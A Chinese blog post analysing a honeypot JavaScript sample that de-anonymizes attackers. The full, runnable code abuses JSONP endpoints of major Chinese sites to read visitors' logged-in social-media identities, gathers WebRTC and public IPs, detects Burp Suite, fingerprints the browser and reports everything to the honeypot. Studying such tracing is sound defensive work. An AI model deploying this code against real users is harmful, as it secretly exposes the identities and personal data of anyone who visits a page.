zoukankan      html  css  js  c++  java
  • 利用社交账号精准溯源的蜜罐技术

    简介

    蜜罐技术是一项已经产生很久的安全技术,普遍运用于情报收集、混淆黑客攻击面、拖延攻击时间。传统的蜜罐刻画的黑客肖像通常只能精确到一级ip,而通常黑客并不直接使用自身ip发起攻击,往往有设置了多层代理,这导致了溯源困难。
    然而无论黑客怎么设置代理,攻击的设备一般还是使用自身笔记本,故如果能够获取设备中的特点指纹信息,尤其是社交账号信息,那溯源精准度是ip无法比拟的。故利用大厂的jsonp接口,获取黑客社交账号,再而进步一将信息提供给公安机关,可以有效缩短溯源时间

    通过此技术需要溯源,需要满足以下几个条件

    1. 登陆过社交媒体,且未退出
    2. 能找到相关社交媒体网站的jsonp接口,可以泄露敏感信息即可
    接口对比

    该项技术需要通过跨域技术,调用相关社交媒体帐号的接口,于是存在两种接口

    1. jsonp接口。这类接口可跨域,且效果好,容易集成在蜜罐中,如果服务方未做特殊限制的话,一般可以调用成功
    2. 跨域资源共享(CORS) 这种接口需要相关社交媒体的接口允许跨域,且返回的Access-Control-Allow-Origin为*,才可以跨域调用。但是却又无法携带cookie。因为浏览器跨域原因,该类接口无法作为收集黑客信息使用

    cors接口获取bduss信息,失败截图

    样本分析

    有幸在论坛中找到一个蜜罐样本,所以分析一下

    该js样本混淆不是很强。只是单纯替换变量名,我们直接还原即可。以下只提供还原后的代码

    获取攻击人员ip地址

    获取黑客的ip地址,分别通过webrtc与淘宝接口。但是在最新版的浏览器中,webrtc因为隐私问题,已经被浏览器禁止通过该接口获取用户ip。淘宝接口从浏览器端调用该接口的话,获取的ip准确度较高

    
            callJSONP("https://www.taobao.com/help/getip.php", 'cb',
            function(_0xd31803) {
                sendData["network"]["externalIP"] = _0xd31803['ip'];
            });
    
    
    
    function getPrivateIP() {
        var _0x410a6f;
        window['RTCPeerConnection'] = window["RTCPeerConnection"] || window["mozRTCPeerConnection"] || window["webkitRTCPeerConnection"];
        var _0x38415d = new RTCPeerConnection({
            'iceServers': []
        }),
        _0xb15922 = function() {};
        _0x38415d["createDataChannel"]('');
        _0x38415d["createOffer"](_0x38415d['setLocalDescription'][a0_0x2f25('0x31')](_0x38415d), _0xb15922);
        _0x38415d["onicecandidate"] = function(_0x5917f2) {
            if (!_0x5917f2 || !_0x5917f2["candidate"] || !_0x5917f2["candidate"]["candidate"]) return;
            _0x410a6f = /([0-9]{1,3}(.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/ ["exec"](_0x5917f2["candidate"]["candidate"])[0x1];
            _0x38415d["onicecandidate"] = _0xb15922;
        };
        var _0x2b51c1 = new Promise(function(_0x38c572, _0x3b13dc) {
            setTimeout(() = >{
                _0x38c572(_0x410a6f);
            },
            0x4b0);
        });
        return _0x2b51c1;
    }
    
    

    获取burp信息

    function getToolInfo() {
        const _0x53a902 = {};
        var _0x236306 = new Image();
        _0x236306['onload'] = function() {
            _0x53a902['burpDet'] = true;
            sendData['tool'] = _0x53a902;
        };
        _0x236306["onerror"] = function(_0x152b0b) {
            _0x53a902["burpDet"] = ![];
            sendData["tool"] = _0x53a902;
        };
        _0x236306["src"] = "http://burp/favicon.ico";
    }
    

    调用fingerprint库,获取指纹

    这个库其实没有太多用,样本中很大一部分代码都是该库的代码

    function getFpHash(_0x48e364) {
        const _0x20846d = _0x48e364["map"](function(_0x260019) {
            return _0x260019["value"];
        });
        return Fingerprint2["a0_0x2f25('0x50')"](_0x20846d["join"](''), 0x1f);
    }
    

    社交媒体

    重点在getSocialInfo函数,根据接口,调用jsonp分别获取用户的社交媒体相关信息,以下我单独抠出来了,可以直接运行

    const version = '1.0';
    
    
    function callJSONP(jsonp_url, jsonp_param, callback_func) {
        const _0x2482f8 = "jQuery" + (version + Math["random"]())["replace"](/D/g, '') + new Date()["getTime"]();
        function _0x4923ad(_0x2d9f6b, _0x11ecab) {
            window[_0x2d9f6b] = _0x11ecab;
        }
        function _0x156417(jsonp_url, jsonp_param, callback_func) {
            var _0x340b9a = document['createElement']('a');
            _0x340b9a["href"] = jsonp_url;
            if (_0x340b9a["search"]['length']) {
                return jsonp_url + '&' + jsonp_param + '=' + callback_func;
            }
            return jsonp_url + '?' + jsonp_param + '=' + callback_func;
        }
        _0x4923ad(_0x2482f8, callback_func);
        jsonp_url = _0x156417(jsonp_url, jsonp_param, _0x2482f8);
        loadJS(jsonp_url);
    }
    
    
    function loadJS(_0x51fe15) {
        var _0x2555d3 = document["createElement"]('script');
        _0x2555d3["src"] = _0x51fe15;
        _0x2555d3['async'] = true;
        document["body"]["appendChild"](_0x2555d3);
    }
    
    
    callJSONP("http://comment.api.163.com/api/v1/products/a2869674571f77b5a…db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121", "callback",
    function(_0xa8b1cd) {
        console.log(_0xa8b1cd)
    });
    

    在这里一共出现了很多jsonp接口,可能因为时间问题,很多接口目前已经无法继续使用

    'https://baike.baidu.com/api/usercenter/login?msg=1&_=1560425055850'
    'https://www.taobao.com/help/getip.php'
    'http://pv.sohu.com/cityjson?ie=utf-8'
    'https://api.m.jd.com/api?appid=pc_home_page&functionId=getBaseUserInfo&loginType=3'
    'https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11'
    'https://employer.58.com/index/enterpriseinfo'
    'http://api.t.sina.com.cn/account/verify_credentials.json?source=27457034'
    'https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B%22module%22%3A%22Base.VideoFeedsUrlServer%22%2C%22method%22%3A%22GetVideoFeedsUrl%22%2C%22param%22%3A%7B%22fileid%22%3A%220_11_013ee9171515dd784f7988b354084cf1a294299e.zip%22%7D%7D%2C%22DB%22%3A%7B%22module%22%3A%22ScoreCenter.ScoreCenterEx%22%2C%22method%22%3A%22free_login%22%2C%22param%22%3A%7B%22test%22%3A0%2C%22redirect%22%3A%22https%3A%2F%2Factivity.m.duiba.com.cn%2Fsubpage%2Findex%3FskinId%3D1049%22%2C%22activeId%22%3A0%2C%22activeType%22%3A%22%22%7D%7D%2C%22A%22%3A%7B%22module%22%3A%22CDN.SrfCdnDispatchServer%22%2C%22method%22%3A%22GetCdnDispatch%22%2C%22param%22%3A%7B%22guid%22%3A%22MS%22%7D%7D%2C%22B%22%3A%7B%22module%22%3A%22VipActivity.AwardPay%22%2C%22method%22%3A%22GetPayRank%22%2C%22param%22%3A%7B%22actid%22%3A%22D8D2CAAC126AE8FB%22%2C%22pagesize%22%3A0%7D%7D%2C%22C%22%3A%7B%22module%22%3A%22login.BasicinfoServer%22%2C%22method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D'
    'https://login.sina.com.cn/sso/prelogin.php?entry=weibo&su=&rsakt=mod&client=ssologin.js(v1.4.19)'
    'http://comment.api.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121'
    'http://message.dangdang.com/api/msg_detail.php?customer_id=o4P00TweebicwjhS72NWew%3D%3D&data_type=jsonp&pageindex=1&module=1&pagesize=10&_=1596772198527'
    "https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11"
    
    
    

    附跨域利用微博接口获取用户信息截图

    最终通过reportInfo函数,发送给蜜罐做溯源分析

    function reportInfo(_0x40eee1) {
        const _0x56bbdc = "/api/portrait";
        const _0x279db4 = new XMLHttpRequest();
        _0x279db4['open']("POST", _0x56bbdc, true);
        _0x279db4["setRequestHeader"]("Content-Type", "application/json");
        _0x40eee1 = JSON["stringify"](_0x40eee1);
        _0x279db4["send"](_0x40eee1);
    }
    

    附核心代码

    
    var a0_0x2fc9 = ['displayName', 'replace', 'http://burp/favicon.ico', 'isAuthenticated', 'href', 'key', 'setRequestHeader', 'onicecandidate', 'publicIP', 'search', 'avatar_hd', 'https://baike.baidu.com/api/usercenter/login?msg=1&_=1560425055850', 'webkitRTCPeerConnection', 'network', 'POST', '/api/portrait', 'callback', 'https://www.taobao.com/help/getip.php', 'email', 'jsonp', 'tool', 'bind', 'cip', 'username', 'http://pv.sohu.com/cityjson?ie=utf-8', 'candidate', 'RTCPeerConnection', 'data', 'uin', 'createOffer', 'sina', 'murmur', 'join', 'exec', 'iqiyi', 'user', 'https://api.m.jd.com/api?appid=pc_home_page&functionId=getBaseUserInfo&loginType=3', 'isLogin', 'then', 'map', 'push', 'extraInfo', 'queryInfo', 'netease', 'https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11', 'headImg', 'onerror', 'https://employer.58.com/index/enterpriseinfo', 'body', 'privateIP', 'createElement', 'random', 'x64hash128', 'http://api.t.sina.com.cn/account/verify_credentials.json?source=27457034', 'returnObj', 'externalIP', 'src', 'screen_name', 'mozRTCPeerConnection', 'https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B%22module%22%3A%22Base.VideoFeedsUrlServer%22%2C%22method%22%3A%22GetVideoFeedsUrl%22%2C%22param%22%3A%7B%22fileid%22%3A%220_11_013ee9171515dd784f7988b354084cf1a294299e.zip%22%7D%7D%2C%22DB%22%3A%7B%22module%22%3A%22ScoreCenter.ScoreCenterEx%22%2C%22method%22%3A%22free_login%22%2C%22param%22%3A%7B%22test%22%3A0%2C%22redirect%22%3A%22https%3A%2F%2Factivity.m.duiba.com.cn%2Fsubpage%2Findex%3FskinId%3D1049%22%2C%22activeId%22%3A0%2C%22activeType%22%3A%22%22%7D%7D%2C%22A%22%3A%7B%22module%22%3A%22CDN.SrfCdnDispatchServer%22%2C%22method%22%3A%22GetCdnDispatch%22%2C%22param%22%3A%7B%22guid%22%3A%22MS%22%7D%7D%2C%22B%22%3A%7B%22module%22%3A%22VipActivity.AwardPay%22%2C%22method%22%3A%22GetPayRank%22%2C%22param%22%3A%7B%22actid%22%3A%22D8D2CAAC126AE8FB%22%2C%22pagesize%22%3A0%7D%7D%2C%22C%22%3A%7B%22module%22%3A%22login.BasicinfoServer%22%2C%22method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D', 'stringify', 'avatar', 'get', 'Content-Type', 'application/json', 'social', 'value', 'getTime', 'jdScore', 'rankinfo', 'uid', 'toString', 'send', 'jQuery', 'split', 'createDataChannel', 'appendChild', 'https://login.sina.com.cn/sso/prelogin.php?entry=weibo&su=&rsakt=mod&client=ssologin.js(v1.4.19)', 'http://comment.api.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121', 'uname', 'baidu', 'name', 'burpDet']; (function(_0x3095b6, _0x2fc9a8) {
        var _0x2f254b = function(_0x4dc742) {
            while (--_0x4dc742) {
                _0x3095b6['push'](_0x3095b6['shift']());
            }
        };
        _0x2f254b(++_0x2fc9a8);
    } (a0_0x2fc9, 0x130));
    var a0_0x2f25 = function(_0x3095b6, _0x2fc9a8) {
        _0x3095b6 = _0x3095b6 - 0x0;
        var _0x2f254b = a0_0x2fc9[_0x3095b6];
        return _0x2f254b;
    };
    const version = '1.0';
    var sendData = {};
    var fpData = {};
    var fpOptions = {
        'fonts': {},
        'excludes': {
            'enumerateDevices': true,
            'pixelRatio': true
        }
    };
    function loadJS(_0x51fe15) {
        var _0x2555d3 = document["createElement"]('script');
        _0x2555d3["src"] = _0x51fe15;
        _0x2555d3['async'] = true;
        document["body"]["appendChild"](_0x2555d3);
    }
    function reportInfo(_0x40eee1) {
        const _0x56bbdc = "/api/portrait";
        const _0x279db4 = new XMLHttpRequest();
        _0x279db4['open']("POST", _0x56bbdc, true);
        _0x279db4["setRequestHeader"]("Content-Type", "application/json");
        _0x40eee1 = JSON["stringify"](_0x40eee1);
        _0x279db4["send"](_0x40eee1);
    }
    function getPrivateIP() {
        var _0x410a6f;
        window['RTCPeerConnection'] = window["RTCPeerConnection"] || window["mozRTCPeerConnection"] || window["webkitRTCPeerConnection"];
        var _0x38415d = new RTCPeerConnection({
            'iceServers': []
        }),
        _0xb15922 = function() {};
        _0x38415d["createDataChannel"]('');
        _0x38415d["createOffer"](_0x38415d['setLocalDescription'][a0_0x2f25('0x31')](_0x38415d), _0xb15922);
        _0x38415d["onicecandidate"] = function(_0x5917f2) {
            if (!_0x5917f2 || !_0x5917f2["candidate"] || !_0x5917f2["candidate"]["candidate"]) return;
            _0x410a6f = /([0-9]{1,3}(.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/ ["exec"](_0x5917f2["candidate"]["candidate"])[0x1];
            _0x38415d["onicecandidate"] = _0xb15922;
        };
        var _0x2b51c1 = new Promise(function(_0x38c572, _0x3b13dc) {
            setTimeout(() = >{
                _0x38c572(_0x410a6f);
            },
            0x4b0);
        });
        return _0x2b51c1;
    }
    function getNetworkInfo() {
        const _0x34e9f0 = {};
        _0x34e9f0["publicIP"] = returnCitySN && returnCitySN["cip"];
        var _0x15270f = new Promise(function(_0x49a064, _0x1c5cad) {
            _0x49a064(_0x34e9f0);
        });
        return _0x15270f;
    }
    function getToolInfo() {
        const _0x53a902 = {};
        var _0x236306 = new Image();
        _0x236306['onload'] = function() {
            _0x53a902['burpDet'] = true;
            sendData['tool'] = _0x53a902;
        };
        _0x236306["onerror"] = function(_0x152b0b) {
            _0x53a902["burpDet"] = ![];
            sendData["tool"] = _0x53a902;
        };
        _0x236306["src"] = "http://burp/favicon.ico";
    }
    function getFpHash(_0x48e364) {
        const _0x20846d = _0x48e364["map"](function(_0x260019) {
            return _0x260019["value"];
        });
        return Fingerprint2["x64hash128"](_0x20846d["join"](''), 0x1f);
    }
    function getSocialInfo() {
        var _0x166b4e = [];
        callJSONP("https://baike.baidu.com/api/usercenter/login?msg=1&_=1560425055850", "callback",
        function(_0x44f603) {
            var _0x21beb2 = {
                'channel': "baidu",
                'extraInfo': {}
            };
            if (_0x44f603["isLogin"]) {
                if (_0x44f603['uid']) {
                    _0x21beb2['uid'] = _0x44f603["uid"]['toString']();
                }
                if (_0x44f603["displayName"]) {
                    _0x21beb2["name"] = _0x44f603['displayName'];
                }
                if (_0x44f603["uname"]) {
                    _0x21beb2["name"] = _0x44f603['uname'];
                    _0x21beb2["uname"] = _0x44f603["uname"];
                }
                if (_0x44f603['portraitUrl']) {
                    _0x21beb2["avatar"] = _0x44f603['portraitUrl'];
                }
                _0x166b4e["push"](_0x21beb2);
            }
        });
        callJSONP(a0_0x2f25('0x4b'), "callback",
        function(_0x113e4f) {
            var _0x434078 = {
                'channel': '58',
                'extraInfo': {}
            };
            _0x113e4f = _0x113e4f['data'];
            if (_0x113e4f['username']) {
                _0x434078["uname"] = _0x113e4f[a0_0x2f25('0x33')];
                _0x166b4e["push"](_0x434078);
            }
        });
        callJSONP("http://api.t.sina.com.cn/account/verify_credentials.json?source=27457034", "callback",
        function(_0xa8b1cd) {
            console.log(_0xa8b1cd)
            var _0x51ee5f = {
                'channel': 'weibo',
                'extraInfo': {}
            };
            if (_0xa8b1cd['data']) {
                _0xa8b1cd = _0xa8b1cd['data'];
                if (_0xa8b1cd['id']) {
                    _0x51ee5f["uid"] = _0xa8b1cd['id']["toString"]();
                    if (_0xa8b1cd[a0_0x2f25('0x2')]) {
                        _0x51ee5f["name"] = _0xa8b1cd['screen_name'];
                    }
                    if (_0xa8b1cd["name"]) {
                        _0x51ee5f["name"] = _0xa8b1cd["name"];
                    }
                    if (_0xa8b1cd[a0_0x2f25('0x26')]) {
                        _0x51ee5f["avatar"] = _0xa8b1cd['avatar_hd'];
                    }
                    _0x166b4e["push"](_0x51ee5f);
                }
            }
        });
        callJSONP("https://api.m.jd.com/api?appid=pc_home_page&functionId=getBaseUserInfo&loginType=3", "jsonp",
        function(_0xfbf730) {
            var _0x5d43c8 = {
                'channel': 'jd',
                'extraInfo': {}
            };
            if (_0xfbf730[a0_0x2f25('0x52')]) {
                _0xfbf730 = _0xfbf730[a0_0x2f25('0x52')];
                if (_0xfbf730[a0_0x2f25('0x1f')] == 0x1) {
                    _0x5d43c8["name"] = _0xfbf730['userNickName'];
                    _0x5d43c8[a0_0x2f25('0x45')] = {
                        'jdScore': _0xfbf730[a0_0x2f25('0xd')],
                        'xbCreditScore': _0xfbf730['xbCreditScore']
                    };
                    if (_0xfbf730[a0_0x2f25('0x49')]) {
                        _0x5d43c8["avatar"] = _0xfbf730[a0_0x2f25('0x49')];
                    }
                    _0x166b4e["push"](_0x5d43c8);
                }
            }
        });
        callJSONP("https://login.sina.com.cn/sso/prelogin.php?entry=weibo&su=&rsakt=mod&client=ssologin.js(v1.4.19)", "callback",
        function(_0x4aac43) {
            var _0x442377 = {
                'channel': a0_0x2f25('0x3a'),
                'extraInfo': {}
            };
            if (_0x4aac43["uid"]) {
                _0x442377["uid"] = _0x4aac43["uid"]["toString"]();
                _0x166b4e["push"](_0x442377);
            }
        });
        callJSONP("http://comment.api.163.com/api/v1/products/a2869674571f77b5a…db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121", 'callback',
        function(_0x569fd6) {
            var _0x16f4e7 = {
                'channel': a0_0x2f25('0x47'),
                'extraInfo': {}
            };
            if (_0x569fd6[a0_0x2f25('0x3f')]) {
                _0x569fd6 = _0x569fd6[a0_0x2f25('0x3f')];
                if (_0x569fd6['userId']) {
                    _0x16f4e7["uid"] = _0x569fd6['userId']['toString']();
                }
                if (_0x569fd6["avatar"]) {
                    _0x16f4e7["avatar"] = _0x569fd6['avatar'];
                }
                if (_0x569fd6[a0_0x2f25('0x33')]) {
                    _0x16f4e7["uname"] = atob(_0x569fd6['username']);
                }
                _0x166b4e['push'](_0x16f4e7);
            }
        });
        callJSONP("https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B…method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D", "callback",
        function(_0x14e20e) {
            const _0x4fb80a = {
                'channel': 'qq'
            };
            const _0x24eb14 = _0x14e20e['B'];
            const _0x2d845f = _0x14e20e['C'];
            if (_0x24eb14['data'] && _0x2d845f['data']) {
                var _0x355a27 = ![];
                const _0x41f36d = _0x24eb14["data"];
                const _0x79742d = _0x2d845f["data"];
                if (_0x41f36d && _0x41f36d[a0_0x2f25('0xe')] && _0x41f36d[a0_0x2f25('0xe')]['uin']) {
                    _0x4fb80a["uid"] = _0x41f36d[a0_0x2f25('0xe')][a0_0x2f25('0x38')]["toString"]();
                    _0x4fb80a["uname"] = _0x41f36d['rankinfo'][a0_0x2f25('0x38')]["toString"]();
                    _0x355a27 = true;
                }
                if (_0x79742d["name"]) {
                    _0x4fb80a["name"] = _0x79742d['name'];
                    _0x355a27 = true;
                }
                if (_0x355a27) {
                    _0x166b4e["push"](_0x4fb80a);
                }
            }
        });
        var _0x5f4ffa = {
            'channel': "iqiyi",
            'extraInfo': {}
        };
        if (cb_r0r7tg["uid"]) {
            _0x5f4ffa['uid'] = cb_r0r7tg["uid"]["toString"]();
            if (cb_r0r7tg["data"]) {}
            _0x166b4e["push"](_0x5f4ffa);
        }
        callJSONP('http://message.dangdang.com/api/msg_detail.php?customer_id=o4P00TweebicwjhS72NWew%3D%3D&data_type=jsonp&pageindex=1&module=1&pagesize=10&_=1596772198527', 'callback',
        function(_0x5f0be3) {
            const _0xab7f14 = {
                'channel': 'dangdang'
            };
            if (_0x5f0be3[a0_0x2f25('0x46')]) {
                _0x5f0be3 = _0x5f0be3['queryInfo'];
                if (_0x5f0be3['ddoy']) {
                    for (var _0x379720 of _0x5f0be3['ddoy'][a0_0x2f25('0x13')]('&')) {
                        paramSplit = _0x379720['split']('=');
                        if (paramSplit['length'] == 0x2) {
                            var _0x5dcb77 = paramSplit[0x0];
                            var _0x156e95 = paramSplit[0x1];
                            if (_0x5dcb77 == "uname" && _0x156e95) {
                                _0xab7f14["uname"] = _0x156e95;
                            } else if (_0x5dcb77 == a0_0x2f25('0x2e') && _0x156e95) {
                                _0xab7f14[a0_0x2f25('0x2e')] = _0x156e95;
                            }
                            _0x166b4e["push"](_0xab7f14);
                        }
                    }
                }
            }
        });
        var _0x2e1a87 = new Promise(function(_0x16e027, _0x5b0956) {
            window['setTimeout'](function() {
                _0x16e027(_0x166b4e);
            },
            0x4b0);
        });
        return _0x2e1a87;
    }
    function callJSONP(jsonp_url, jsonp_param, callback_func) {
        const _0x2482f8 = "jQuery" + (version + Math["random"]())["replace"](/D/g, '') + new Date()["getTime"]();
        function _0x4923ad(_0x2d9f6b, _0x11ecab) {
            window[_0x2d9f6b] = _0x11ecab;
        }
        function _0x156417(jsonp_url, jsonp_param, callback_func) {
            var _0x340b9a = document['createElement']('a');
            _0x340b9a["href"] = jsonp_url;
            if (_0x340b9a["search"]['length']) {
                return jsonp_url + '&' + jsonp_param + '=' + callback_func;
            }
            return jsonp_url + '?' + jsonp_param + '=' + callback_func;
        }
        _0x4923ad(_0x2482f8, callback_func);
        jsonp_url = _0x156417(jsonp_url, jsonp_param, _0x2482f8);
        loadJS(jsonp_url);
    }
    function handleComponent(_0x3003a0) {
        fpData["murmur"] = getFpHash(_0x3003a0);
        for (var _0x48f6e6 in _0x3003a0) {
            const _0x5e47d2 = _0x3003a0[_0x48f6e6];
            const _0x1384f0 = _0x5e47d2["key"];
            const _0x2bac91 = _0x5e47d2["value"];
            fpData[_0x1384f0] = _0x2bac91;
        }
        sendData['browser'] = fpData;
        getToolInfo();
        getNetworkInfo()['then'](function(_0xcae004) {
            callJSONP("https://www.taobao.com/help/getip.php", 'cb',
            function(_0xd31803) {
                sendData["network"]["externalIP"] = _0xd31803['ip'];
            });
            getPrivateIP()["then"](function(_0x17cdc5) {
                sendData["network"]["privateIP"] = _0x17cdc5;
                getSocialInfo()["then"](function(_0x33c15c) {
                    sendData[social] = _0x33c15c;
                    reportInfo(sendData);
                });
            });
        });
    }
    loadJS("http://pv.sohu.com/cityjson?ie=utf-8");
    loadJS("https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11");
    if (window['requestIdleCallback']) {
        requestIdleCallback(function() {
            Fingerprint2['get'](fpOptions, handleComponent);
        });
    } else {
        setTimeout(function() {
            Fingerprint2[a0_0x2f25('0x7')](fpOptions, handleComponent);
        },
        0x1f4);
    }
    
    
    
    
  • 相关阅读:
    Ubuntu上搭建Watir-Webdriver与Cucumber环境
    使--no-ri --no-rdoc成为gem安装的默认选项
    Ruby require 路径问题
    【原创】LoadRunner Java Vuser脚本的配置和调试指南
    【原创】LoadRunner Java Vuser开发环境配置指南
    【原创】使用Nmon_Analyzer处理较大nmon文件的方法
    2014年,马上要上班啦,希望一切顺利
    关于.jar的文件在cmd中无法连接数据库的问题
    ios 的通知机制
    ios开发小技巧-用宏化简代码
  • 原文地址:https://www.cnblogs.com/potatsoSec/p/13801495.html
Copyright © 2011-2022 走看看